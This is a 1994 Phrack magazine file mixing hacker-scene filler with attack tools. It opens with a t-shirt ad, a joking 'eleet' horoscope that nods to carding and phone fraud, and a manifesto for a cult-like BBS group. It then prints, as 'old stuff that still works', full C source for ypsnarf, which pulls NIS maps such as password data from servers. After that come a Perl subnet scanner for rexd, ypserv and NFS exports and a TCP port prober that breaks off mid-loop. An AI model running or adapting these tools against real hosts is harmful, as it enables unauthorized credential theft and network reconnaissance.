| ==Phrack Magazine== |
|
|
| Volume Five, Issue Forty-Six, File 4 of 28 |
|
|
|
|
| // // /\ // ==== |
| // // //\\ // ==== |
| ==== // // \\/ ==== |
|
|
| /\ // // \\ // /=== ==== |
| //\\ // // // // \=\ ==== |
| // \\/ \\ // // ===/ ==== |
|
|
| PART II |
|
|
| ------------------------------------------------------------------------------ |
|
|
| The official Legion of Doom t-shirts are still available. |
| Join the net.luminaries world-wide in owning one of |
| these amazing shirts. Impress members of the opposite sex, increase |
| your IQ, annoy system administrators, get raided by the government and |
| lose your wardrobe! |
|
|
| Can a t-shirt really do all this? Of course it can! |
|
|
| -------------------------------------------------------------------------- |
|
|
| "THE HACKER WAR -- LOD vs MOD" |
|
|
| This t-shirt chronicles the infamous "Hacker War" between rival |
| groups The Legion of Doom and The Masters of Destruction. The front |
| of the shirt displays a flight map of the various battle-sites |
| hit by MOD and tracked by LOD. The back of the shirt |
| has a detailed timeline of the key dates in the conflict, and |
| a rather ironic quote from an MOD member. |
|
|
| (For a limited time, the original is back!) |
|
|
| "LEGION OF DOOM -- INTERNET WORLD TOUR" |
|
|
| The front of this classic shirt displays "Legion of Doom Internet World |
| Tour" as well as a sword and telephone intersecting the planet |
| earth, skull-and-crossbones style. The back displays the |
| words "Hacking for Jesus" as well as a substantial list of "tour-stops" |
| (internet sites) and a quote from Aleister Crowley. |
|
|
| -------------------------------------------------------------------------- |
|
|
| All t-shirts are sized XL, and are 100% cotton. |
|
|
| Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for |
| postage. |
|
|
| Send checks or money orders. Please, no credit cards, even if |
| it's really your card. |
|
|
|
|
| Name: __________________________________________________ |
|
|
| Address: __________________________________________________ |
|
|
| City, State, Zip: __________________________________________ |
|
|
|
|
| I want ____ "Hacker War" shirt(s) |
|
|
| I want ____ "Internet World Tour" shirt(s) |
|
|
| Enclosed is $______ for the total cost. |
|
|
|
|
| Mail to: Chris Goggans |
| 603 W. 13th #1A-278 |
| Austin, TX 78701 |
|
|
|
|
| These T-shirts are sold only as a novelty items, and are in no way |
| attempting to glorify computer crime. |
|
|
| ------------------------------------------------------------------------------ |
|
|
| introducing... |
|
|
| The PHRACK Horoscope, Summer 1994 |
|
|
| Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer |
|
|
| --- |
|
|
| Do you believe in the stars? Many do, some don't. In fact, the stars |
| can tell you a whole lot about the future. That's bullshit? You don't |
| believe it? Good. Be doomed. See you in hell. Here's the official PHRACK |
| horoscope for all eleet hackerz for the summer of 1994. |
|
|
| You can use this chart to find out your zodiac sign by your DOB. |
|
|
| Aquarius.....01/20 - 02/18 Leo..........07/23 - 08/22 |
| Pisces.......02/19 - 03/20 Virgo........08/23 - 09/22 |
| Aries........03/21 - 04/19 Libra........09/23 - 10/22 |
| Taurus.......04/20 - 05/20 Scorpio......10/23 - 11/21 |
| Gemini.......05/21 - 06/20 Sagittarius..11/22 - 12/21 |
| Cancer.......06/21 - 07/22 Capricorn....12/22 - 01/19 |
|
|
| --- |
|
|
| oOo This summer's best combinations oOo |
|
|
| YOU LOVE BS VICTIM H0T WAREZ |
| ============================================================== |
| Aquarius Libra Leo Sagittarius |
| Pisces Sagittarius Aquarius Cancer |
| Aries Aries Cancer Capricorn |
| Taurus Gemini Pisces Taurus |
| Gemini Cancer Aries Scorpio |
| Cancer Leo Virgo Gemini |
| Leo Scorpio Gemini Leo |
| Virgo Capricorn Sagittarius Libra |
| Libra Virgo Libra Virgo |
| Scorpio Pisces Capricorn Pisces |
| Sagittarius Aquarius Scorpio Aquarius |
| Capricorn Taurus Taurus Aries |
| ============================================================== |
|
|
| --- |
|
|
| And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope! |
|
|
| Aries [March 21st - April 19th] |
|
|
| There is a pot full of k0DeZ at the end of the rainbow for you. |
| Try to channel all your ambition on finding it, hint: you won't |
| find it in /bin/gif/kitchen.gear. |
| Warning: Risk of bust between August 5th and August 10th! |
| Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....] |
|
|
| Taurus [April 20th - May 20th] |
|
|
| PhedZzZz are lurking behind Saturn, obscured behind one of the rings. |
| Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake |
| any interstellar space travel, and avoid big yellow ships. |
| Watch out for SprintNet Security between July 12th and August 1st. |
| Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..] |
|
|
| Gemini [May 21st - June 20th] |
|
|
| There might be a force dragging you into warez boards. Try to resist |
| the attraction, or you might be thrown out of the paradise. |
| Hint: If a stranger with a /ASL connect crosses your way, stay away |
| from him. |
| Warning: Your Dual Standard HST might explode sometime in June. |
| Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...] |
|
|
| Cancer [June 21st - July 22nd] |
|
|
| There are dark forces on your trail. Try to avoid all people wearing |
| suits, don't get in their cars, and don't let them give you shit. |
| Hint: Leave the country as soon if you can, or you won't be able to. |
| Look out for U4EA on IRC in late July, you might get /killed. |
| Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...] |
|
|
| Leo [July 23rd - August 22nd] |
|
|
| The path of Venus this year tells us that there is love on the way |
| for you. Don't look for it on X-rated ftp sites, it might be out there |
| somewhere. Hint: Try getting out of the house more frequently or you |
| might miss it. |
| Warning: If Monica Weaver comes across your way, break and run! |
| Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.] |
|
|
| Virgo [August 23rd - September 22nd] |
|
|
| Pluto tells us that you should stay away from VAXes in the near future. |
| Lunatic force tells us that you might have more luck on Berkeley UNIX. |
| Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs. |
| Warning: In the first week of October, there is a risk of being ANIed. |
| Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....] |
|
|
| Libra [September 23rd - October 22nd] |
|
|
| The closer way of Mars around the Sun this year might mean that you |
| will be sued by a telco or a big corporation. The eclipse of Uranus |
| could say that you might have some luck and card a VGA 486 Laptop. |
| Hint: Be careful on the cordless. |
| Watch out for good stuff in dumpsters between July 23rd and July 31st. |
| Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...] |
|
|
| Scorpio [October 23rd - November 21st] |
|
|
| Sun propulsions say that you should spend more time exploring the |
| innards of credit report systems, but be aware that Saturn reminds |
| you that one local car dealer has his I.D. monitored. |
| Hint: Stay out of #warez |
| Warning: A star called 43-141 might be your doom. Watch out. |
| Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...] |
|
|
| Sagittarius [November 22nd - December 21st] |
|
|
| Cold storms on Pluto suggest that you don't try to play eleet |
| anarchist on one of the upcoming cons. Pluto also sees that there |
| might be a slight chance that you catch a bullet pestering a cop. |
| Hint: Be nice to your relatives. |
| You might get lucky BSing during the third week of August. |
| Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...] |
|
|
| Capricorn [December 22nd - January 19th] |
|
|
| This summer brings luck to you. Everything you try is about to work |
| out. You might find financial gain in selling k0DeZ to local warez |
| bozos. Hint: Don't try to BS at a number who is a prime number, they |
| will trace your ass and beat you to death with a raw cucumber. |
| Special kick of luck between June 14th and July 2nd. |
| Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..] |
|
|
| Aquarius [January 20th - February 18th] |
|
|
| The third moon of Saturn suggests to stay in bed over the whole |
| summer, or everything will worsen. Avoid to go to any meetings |
| and cons. Do not try to get up before September 11th. |
| Hint: You can risk to call PRODIGY and have a gR3aT time. |
| Warning: High chance of eavesdroping on your line on August 14th. |
| Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....] |
|
|
| Pisces [February 19th - March 20th] |
|
|
| Mars reads a high mobility this summer. You should try to go to a |
| foreign county, maybe visit HEU II. Finances will be OK. Do not go |
| on any buses for that might be your doom. |
| Hint: Don't get a seat near a window, whatever you do. |
| Warning: Avoid 6'8" black guys in Holland, they might go for your ass. |
| Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...] |
|
|
|
|
| If your horoscope does not come true, complain to god@heaven.mil. 31337 |
| If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R |
|
|
| ------------------------------------------------------------------------------ |
|
|
| :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: |
| The SenseReal Mission |
| If you are reading this it indicates you have reached a point |
| along your journey that you will have to decide whether you agree |
| with The SenseReal Foundation or whether you think that those who |
| believe and support The SenseReal Foundation are crazy. Your |
| decision to join The SenseReal Foundation on it's mission will |
| undoubtedly change your life forever. When you understand the |
| reason it exists and what it seeks you will better know how to |
| decide. That is why this text was created. |
| He is known as Green Ghost. Some know him as Jim Nightshade. He |
| was born in 1966. He is not a baby boomer and he is not a |
| Generation Xer. He falls into that group of the population that |
| has so far escaped definition. He is a (yberpunk. He was (yberpunk |
| before (yberpunk was cool. He is the founder and leader of The |
| SenseReal Foundation. You will learn more about him later. |
| But first you will have to know about the background. There once |
| was a man named Albert Hoffman. In 1943, on April 16 Hoffman |
| absorbed a threshold amount of the drug known as LSD. He |
| experienced "a peculiar restlessness". LSD since that time has |
| played an important role in this world. |
| There are other agents involved in the story. Mary Pinchot, JFK, |
| Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley |
| and many others. There are too many details and explanations |
| necessary to explain everything here. But this does not matter. |
| Because the SenseReal Foundation is about riding the wave. We |
| believe that the ultimate goal cannot be defined. To define it |
| would be to destroy it. |
| The SenseReal Foundation hopes that things can be changed for |
| the better. But we realize that the situation can become |
| much worse. From what history teaches us and what we instinctively |
| feel, we know that there is a great probability that things will |
| get much worse before and if things ever get better. Doom looms |
| on the horizon like an old friend. |
| Freedom is being threatened every day and The SenseReal |
| Foundation seeks to defend and seek Freedom. Big Brother is here |
| NOW and to deny his existence is only to play into his hand. The |
| goal of our government both here in America and worldwide is to |
| remain in power and increase it's control of The People. To |
| expose Big Brother and destroy him is one of the many goals of |
| The SenseReal Foundation. |
| As a member of (yberspace and an agent of The SenseReal |
| Foundation you will have to carefully consider your interaction |
| with the flow of Info. The ideals of Liberty must be maintained. |
| The SenseReal Foundation provides a grounding point. The place |
| where the spark transfers from plasma to light and back to plasma. |
| Tesla was not on the wrong track. The SenseReal Foundation is a |
| mechanism which seeks to increase Freedom. Only by learning more |
| can we defeat the Evil. The Good must prevail. |
| If you have the Hacker spirit and think along the same lines |
| then The SenseReal Foundation may be your calling. If you think |
| like J.R. Dobbs or Green Ghost then it is possible we can make it |
| through The Apocalypse. A final date has never been announced for |
| this event. Green Ghost does not claim to know the exact date but |
| he does claim to have some Info on it. |
| Green Ghost does not claim to have all the answers or even to |
| know all the questions. He was first exposed to computers in the |
| early 70's at his local high school. The first computer he ever |
| used was a Honeywell terminal connected to a mainframe operated |
| at the home office of Honeywell and operated for the school. |
| This machine was programed by feeding it stacks of cards with |
| boxes X'd out with a No. 2 pencil. It did have a keyboard hooked |
| up to a printer which served for the monitor. The text was typed |
| out and the paper rolled out of the machine in great waves. |
| This experience left him wanting more. Somewhere between the |
| machine and the mind were all the questions and all the answers. |
| The SenseReal Foundation will supply some of the means. We |
| must all work together if we are to succeed. UNITED WE STAND, |
| DIVIDED WE FALL. If you wish to participate with The SenseReal |
| Foundation you must devote yourself to becoming an Info Agent. |
| As an Info Agent it is your duty to seek Truth and Knowledge |
| out wherever it is located. To Learn and to seek to increase |
| the Learning of all at The SenseReal Foundation. Different |
| people will be needed to help out in different ways. |
| SenseReal's Info Agents are located all around the world and |
| are in contact with fellow SenseReal members via any one of |
| several SenseReal facilities. The primary establishment and |
| headquarters of The SenseReal Foundation is SenseReal's own |
| online system: |
| T /-/ E /-/ /=\ ( /< E R ' S /\/\ /=\ /\/ S / O /\/ |
| >>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<< |
| 27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation |
| Also contact via SenseReal's mail drop by writing or sending |
| materials to: TSF \ Electronic Mail: |
| P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us |
| HILTON HEAD, SC 29938-6914 \ |
| The Hacker's /\/\ansion is a system like no other. While it is |
| not your typical Hackers board it has much Info on Hacking. While |
| it is not like any Adult system you've ever seen it has the most |
| finest Adult material available anywhere. It is not a Warez board |
| but we are definitely Pirates. Because we are (yberpunks. What |
| makes the Hacker's Mansion different is our emphasis on quality. |
| Everything that you find at The /-/acker's /\/\ansion is 1ST |
| (lass. All the coolest E-zines are pursued here. Phrack, CUD, and |
| Thought Virus to name just a few. Of course there is one other |
| source for Thought Virus: |
| Send E-Mail to: ListServ@neonate.atl.ga.us |
| In the subject or body of the message write: |
| FAQ ThoughtCriminals |
| and you will receive the current issue in your E-Mail box in no |
| time. If you wish to join the Thought Criminals mailing list and |
| communicate with your fellow Thought Criminals via E-Mail then |
| send another message to: ListServ@neonate.atl.ga.us |
| and write the following in the subject or body of the message: |
| Subscribe ThoughtCriminals Your-Address-Here |
| or simply: Subscribe ThoughtCriminals |
| To mail others on the Thought Criminals mailing list send a message |
| to: ThoughtCriminals@neonate.atl.ga.us |
| Tell us all. Communication is vital. Our survival may depend on |
| it. The SenseReal Foundation is about the allegiance of many |
| people, and indeed beings, as our friends from other planets can |
| tell you. The EFF inspired us and was a model but we don't have |
| the EFF's money so we need YOU. If you are someone who can |
| contribute or who believes in The Cause or are just interested |
| in Tax Resistance or the Free The Weed movement then you should |
| join The SenseReal Foundation today. Contact us through any of |
| above channels and become a Freedom Fighter today. Time is of |
| the essence. |
| :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: |
|
|
| ------------------------------------------------------------------------------ |
|
|
| ** OLD SHIT THAT STILL WORKS ** |
|
|
| - sometimes - |
|
|
| /* |
| * THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN |
| * THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE |
| * IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM. PLEASE DO NOT |
| * REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY. |
| * |
| * ypsnarf - exercise security holes in yp/nis. |
| * |
| * Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik |
| * (casper@fwi.uva.nl). |
| * |
| * Usage: |
| * ypsnarf server client |
| * - to obtain the yp domain name |
| * ypsnarf server domain mapname |
| * - to obtain a copy of a yp map |
| * ypsnarf server domain maplist |
| * - to obtain a list of yp maps |
| * |
| * In the first case, we lie and pretend to be the host "client", and send |
| * a BOOTPARAMPROC_WHOAMI request to the host "server". Note that for this |
| * to work, "server" must be running rpc.bootparamd, and "client" must be a |
| * diskless client of (well, it must boot from) "server". |
| * |
| * In the second case, we send a YPPROC_DOMAIN request to the host "server", |
| * asking if it serves domain "domain". If so, we send YPPROC_FIRST and |
| * YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map |
| * "mapname". Note that you must specify the full yp map name, you cannot |
| * use the shorthand names provided by "ypcat". |
| * |
| * In the third case, the special map name "maplist" tells ypsnarf to send |
| * a YPPROC_MAPLIST request to the server and get the list of maps in domain |
| * "domain", instead of getting the contents of a map. If the server has a |
| * map called "maplist" you can't get it. Oh well. |
| * |
| * Since the callrpc() routine does not make any provision for timeouts, we |
| * artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the |
| * initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer. |
| * |
| * This program uses UDP packets, which means there's a chance that things |
| * will get dropped on the floor; it's not a reliable stream like TCP. In |
| * practice though, this doesn't seem to be a problem. |
| * |
| * To compile: |
| * cc -o ypsnarf ypsnarf.c -lrpcsvc |
| * |
| * David A. Curry |
| * Purdue University |
| * Engineering Computer Network |
| * Electrical Engineering Building |
| * West Lafayette, IN 47907 |
| * davy@ecn.purdue.edu |
| * January, 1991 |
| */ |
| #include <sys/param.h> |
| #include <sys/socket.h> |
| #include <netinet/in.h> |
| #include <arpa/inet.h> |
| #include <rpc/rpc.h> |
| #include <rpcsvc/bootparam.h> |
| #include <rpcsvc/yp_prot.h> |
| #include <rpc/pmap_clnt.h> |
| #include <sys/time.h> |
| #include <signal.h> |
| #include <string.h> |
| #include <netdb.h> |
| #include <stdio.h> |
|
|
| #define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd */ |
| #define YPSNARF_TIMEOUT1 15 /* timeout for initial request */ |
| #define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */ |
|
|
| char *pname; /* program name */ |
|
|
| main(argc, argv) |
| char **argv; |
| int argc; |
| { |
| char *server, *client, *domain, *mapname; |
|
|
| pname = *argv; |
|
|
| /* |
| * Process arguments. This is less than robust, but then |
| * hey, you're supposed to know what you're doing. |
| */ |
| switch (argc) { |
| case 3: |
| server = *++argv; |
| client = *++argv; |
|
|
| get_yp_domain(server, client); |
| exit(0); |
| case 4: |
| server = *++argv; |
| domain = *++argv; |
| mapname = *++argv; |
|
|
| if (strcmp(mapname, "maplist") == 0) |
| get_yp_maplist(server, domain); |
| else |
| get_yp_map(server, domain, mapname); |
| exit(0); |
| default: |
| fprintf(stderr, "Usage: %s server client -", pname); |
| fprintf(stderr, "to obtain yp domain name\n"); |
| fprintf(stderr, " %s server domain mapname -", pname); |
| fprintf(stderr, "to obtain contents of yp map\n"); |
| exit(1); |
| } |
| } |
|
|
| /* |
| * get_yp_domain - figure out the yp domain used between server and client. |
| */ |
| get_yp_domain(server, client) |
| char *server, *client; |
| { |
| long hostip; |
| struct hostent *hp; |
| bp_whoami_arg w_arg; |
| bp_whoami_res w_res; |
| extern void timeout(); |
| enum clnt_stat errcode; |
|
|
| /* |
| * Just a sanity check, here. |
| */ |
| if ((hp = gethostbyname(server)) == NULL) { |
| fprintf(stderr, "%s: %s: unknown host.\n", pname, server); |
| exit(1); |
| } |
|
|
| /* |
| * Allow the client to be either an internet address or a |
| * host name. Copy in the internet address. |
| */ |
| if ((hostip = inet_addr(client)) == -1) { |
| if ((hp = gethostbyname(client)) == NULL) { |
| fprintf(stderr, "%s: %s: unknown host.\n", pname, |
| client); |
| exit(1); |
| } |
|
|
| bcopy(hp->h_addr_list[0], |
| (caddr_t) &w_arg.client_address.bp_address.ip_addr, |
| hp->h_length); |
| } |
| else { |
| bcopy((caddr_t) &hostip, |
| (caddr_t) &w_arg.client_address.bp_address.ip_addr, |
| sizeof(ip_addr_t)); |
| } |
|
|
| w_arg.client_address.address_type = IP_ADDR_TYPE; |
| bzero((caddr_t) &w_res, sizeof(bp_whoami_res)); |
|
|
| /* |
| * Send a BOOTPARAMPROC_WHOAMI request to the server. This will |
| * give us the yp domain in the response, IFF client boots from |
| * the server. |
| */ |
| signal(SIGALRM, timeout); |
| alarm(YPSNARF_TIMEOUT1); |
|
|
| errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, |
| BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg, |
| xdr_bp_whoami_res, &w_res); |
|
|
| alarm(0); |
|
|
| if (errcode != RPC_SUCCESS) |
| print_rpc_err(errcode); |
|
|
| /* |
| * Print the domain name. |
| */ |
| printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name); |
|
|
| /* |
| * The maximum domain name length is 255 characters, but the |
| * rpc.bootparamd program truncates anything over 32 chars. |
| */ |
| if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN) |
| printf(" (truncated?)"); |
|
|
| /* |
| * Put out the client name, if they didn't know it. |
| */ |
| if (hostip != -1) |
| printf(" (client name = %s)", w_res.client_name); |
|
|
| putchar('\n'); |
| } |
|
|
| /* |
| * get_yp_map - get the yp map "mapname" from yp domain "domain" from server. |
| */ |
| get_yp_map(server, domain, mapname) |
| char *server, *domain, *mapname; |
| { |
| char *reqp; |
| bool_t yesno; |
| u_long calltype; |
| bool (*xdr_proc)(); |
| extern void timeout(); |
| enum clnt_stat errcode; |
| struct ypreq_key keyreq; |
| struct ypreq_nokey nokeyreq; |
| struct ypresp_key_val answer; |
|
|
| /* |
| * This code isn't needed; the next call will give the same |
| * error message if there's no yp server there. |
| */ |
| #ifdef not_necessary |
| /* |
| * "Ping" the yp server and see if it's there. |
| */ |
| signal(SIGALRM, timeout); |
| alarm(YPSNARF_TIMEOUT1); |
|
|
| errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0, |
| xdr_void, 0); |
|
|
| alarm(0); |
|
|
| if (errcode != RPC_SUCCESS) |
| print_rpc_err(errcode); |
| #endif |
|
|
| /* |
| * Figure out whether server serves the yp domain we want. |
| */ |
| signal(SIGALRM, timeout); |
| alarm(YPSNARF_TIMEOUT1); |
|
|
| errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN, |
| xdr_wrapstring, (caddr_t) &domain, xdr_bool, |
| (caddr_t) &yesno); |
|
|
| alarm(0); |
|
|
| if (errcode != RPC_SUCCESS) |
| print_rpc_err(errcode); |
|
|
| /* |
| * Nope... |
| */ |
| if (yesno == FALSE) { |
| fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, |
| server, domain); |
| exit(1); |
| } |
|
|
| /* |
| * Now we just read entry after entry... The first entry we |
| * get with a nokey request. |
| */ |
| keyreq.domain = nokeyreq.domain = domain; |
| keyreq.map = nokeyreq.map = mapname; |
| reqp = (caddr_t) &nokeyreq; |
| keyreq.keydat.dptr = NULL; |
|
|
| answer.status = TRUE; |
| calltype = YPPROC_FIRST; |
| xdr_proc = xdr_ypreq_nokey; |
|
|
| while (answer.status == TRUE) { |
| bzero((caddr_t) &answer, sizeof(struct ypresp_key_val)); |
|
|
| signal(SIGALRM, timeout); |
| alarm(YPSNARF_TIMEOUT2); |
|
|
| errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc, |
| reqp, xdr_ypresp_key_val, &answer); |
|
|
| alarm(0); |
|
|
| if (errcode != RPC_SUCCESS) |
| print_rpc_err(errcode); |
|
|
| /* |
| * Got something; print it. |
| */ |
| if (answer.status == TRUE) { |
| printf("%.*s\n", answer.valdat.dsize, |
| answer.valdat.dptr); |
| } |
|
|
| /* |
| * Now we're requesting the next item, so have to |
| * send back the current key. |
| */ |
| calltype = YPPROC_NEXT; |
| reqp = (caddr_t) &keyreq; |
| xdr_proc = xdr_ypreq_key; |
|
|
| if (keyreq.keydat.dptr) |
| free(keyreq.keydat.dptr); |
|
|
| keyreq.keydat = answer.keydat; |
|
|
| if (answer.valdat.dptr) |
| free(answer.valdat.dptr); |
| } |
| } |
|
|
| /* |
| * get_yp_maplist - get the yp map list for yp domain "domain" from server. |
| */ |
| get_yp_maplist(server, domain) |
| char *server, *domain; |
| { |
| bool_t yesno; |
| extern void timeout(); |
| struct ypmaplist *mpl; |
| enum clnt_stat errcode; |
| struct ypresp_maplist maplist; |
|
|
| /* |
| * This code isn't needed; the next call will give the same |
| * error message if there's no yp server there. |
| */ |
| #ifdef not_necessary |
| /* |
| * "Ping" the yp server and see if it's there. |
| */ |
| signal(SIGALRM, timeout); |
| alarm(YPSNARF_TIMEOUT1); |
|
|
| errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0, |
| xdr_void, 0); |
|
|
| alarm(0); |
|
|
| if (errcode != RPC_SUCCESS) |
| print_rpc_err(errcode); |
| #endif |
|
|
| /* |
| * Figure out whether server serves the yp domain we want. |
| */ |
| signal(SIGALRM, timeout); |
| alarm(YPSNARF_TIMEOUT1); |
|
|
| errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN, |
| xdr_wrapstring, (caddr_t) &domain, xdr_bool, |
| (caddr_t) &yesno); |
|
|
| alarm(0); |
|
|
| if (errcode != RPC_SUCCESS) |
| print_rpc_err(errcode); |
|
|
| /* |
| * Nope... |
| */ |
| if (yesno == FALSE) { |
| fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, |
| server, domain); |
| exit(1); |
| } |
|
|
| maplist.list = (struct ypmaplist *) NULL; |
|
|
| /* |
| * Now ask for the list. |
| */ |
| signal(SIGALRM, timeout); |
| alarm(YPSNARF_TIMEOUT1); |
|
|
| errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST, |
| xdr_wrapstring, (caddr_t) &domain, |
| xdr_ypresp_maplist, &maplist); |
|
|
| alarm(0); |
|
|
| if (errcode != RPC_SUCCESS) |
| print_rpc_err(errcode); |
|
|
| if (maplist.status != YP_TRUE) { |
| fprintf(stderr, "%s: cannot get map list: %s\n", pname, |
| yperr_string(ypprot_err(maplist.status))); |
| exit(1); |
| } |
|
|
| /* |
| * Print out the list. |
| */ |
| for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next) |
| printf("%s\n", mpl->ypml_name); |
| } |
|
|
| /* |
| * print_rpc_err - print an rpc error and exit. |
| */ |
| print_rpc_err(errcode) |
| enum clnt_stat errcode; |
| { |
| fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode)); |
| exit(1); |
| } |
|
|
| /* |
| * timeout - print a timeout and exit. |
| */ |
| void timeout() |
| { |
| fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname); |
| exit(1); |
| } |
|
|
| ------------------------------------------------------------------------------ |
|
|
| #!/bin/perl -s |
| # |
| # Scan a subnet for valid hosts; if given hostname, will look at the |
| # 255 possible hosts on that net. Report if host is running rexd or |
| # ypserv. |
| # |
| # Usage: scan n.n.n.n |
|
|
| # mine, by default |
| $default = "130.80.26"; |
|
|
| $| = 1; |
|
|
| if ($v) { $verbose = 1; } |
|
|
| if ($#ARGV == -1) { $root = $default; } |
| else { $root = $ARGV[0]; } |
|
|
| # ip address |
| if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) { |
| ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root); |
| ($one,$two,$three,$four) = unpack('C4',$host_ip[0]); |
| $root = "$one.$two.$three"; |
| if ($root eq "..") { die "Can't figure out what to scan...\n"; } |
| } |
|
|
| print "Subnet $root:\n" if $verbose; |
| for $i (01..255) { |
| print "Trying $root.$i\t=> " if $verbose; |
| &resolve("$root.$i"); |
| } |
|
|
| # |
| # Do the work |
| # |
| sub resolve { |
|
|
| local($name) = @_; |
|
|
| # ip address |
| if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { |
| ($a,$b,$c,$d) = split(/\./, $name); |
| @ip = ($a,$b,$c,$d); |
| ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); |
| } |
| else { |
| ($name, $aliases, $type, $len, @ip) = gethostbyname($name); |
| ($a,$b,$c,$d) = unpack('C4',$ip[0]); |
| } |
|
|
| if ($name && @ip) { |
| print "$a.$b.$c.$d\t$name\n"; |
| system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R |
| unning ypserv.\"\nfi\nfi"); |
| } |
| else { print "unable to resolve address\n" if $verbose; } |
|
|
| } |
|
|
| sub AF_INET {2;} |
|
|
| ------------------------------------------------------------------------------ |
|
|
| /* |
| * probe_tcp_ports |
| */ |
|
|
|
|
| #include <sys/types.h> |
| #include <sys/stat.h> |
| #include <stdio.h> |
| #include <ctype.h> |
| #include <sys/socket.h> |
| #include <netinet/in.h> |
| #include <netdb.h> |
|
|
| #define RETURN_ERR -1 |
| #define RETURN_FAIL 0 |
| #define RETURN_SUCCESS 1 |
|
|
| int Debug; |
| int Hack; |
| int Verbose; |
|
|
| main(ArgC, ArgV) |
| int ArgC; |
| char **ArgV; |
| { |
| int Index; |
| int SubIndex; |
|
|
| for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++) |
| for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++) |
| switch (ArgV[Index][SubIndex]) |
| { |
| case 'd': |
| Debug++; |
| break; |
| case 'h': |
| Hack++; |
| break; |
| case 'v': |
| Verbose++; |
| break; |
| default: |
| (void) fprintf(stderr, |
| "Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n"); |
| exit(1); |
| } |
|
|
| for (; Index < ArgC; Index++) |
| (void) Probe_TCP_Ports(ArgV[Index]); |
| exit(0); |
| } |
|
|
| Probe_TCP_Ports(Name) |
| char *Name; |
| { |
| unsigned Port; |
| char *Host; |
| struct hostent *HostEntryPointer; |
| struct sockaddr_in SocketInetAddr; |
| struct hostent TargetHost; |
| struct in_addr TargetHostAddr; |
| char *AddressList[1]; |
| char NameBuffer[128]; |
|
|
| extern int inet_addr(); |
| extern char *rindex(); |
|
|
| if (Name == NULL) |
| return (RETURN_FAIL); |
| Host = Name; |
| if (Host == NULL) |
| return (RETURN_FAIL); |
| HostEntryPointer = gethostbyname(Host); |
| if (HostEntryPointer == NULL) |
| { |
| TargetHostAddr.s_addr = inet_addr(Host); |
| if (TargetHostAddr.s_addr == -1) |
| { |
| (void) printf("unknown host: %s\n", Host); |
| return (RETURN_FAIL); |
| } |
| (void) strcpy(NameBuffer, Host); |
| TargetHost.h_name = NameBuffer; |
| TargetHost.h_addr_list = AddressList, TargetHost.h_addr = |
| (char *) &TargetHostAddr; |
| TargetHost.h_length = sizeof(struct in_addr); |
| TargetHost.h_addrtype = AF_INET; |
| TargetHost.h_aliases = 0; |
| HostEntryPointer = &TargetHost; |
| } |
| SocketInetAddr.sin_family = HostEntryPointer->h_addrtype; |
| bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr, |
| HostEntryPointer->h_length); |
|
|
|
|
| for (Port = 1; Port < 65536; Port++) |
